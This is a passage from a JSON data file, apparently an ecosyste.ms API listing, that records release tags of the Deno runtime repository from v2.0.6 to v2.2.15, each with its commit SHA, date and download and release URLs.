:"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":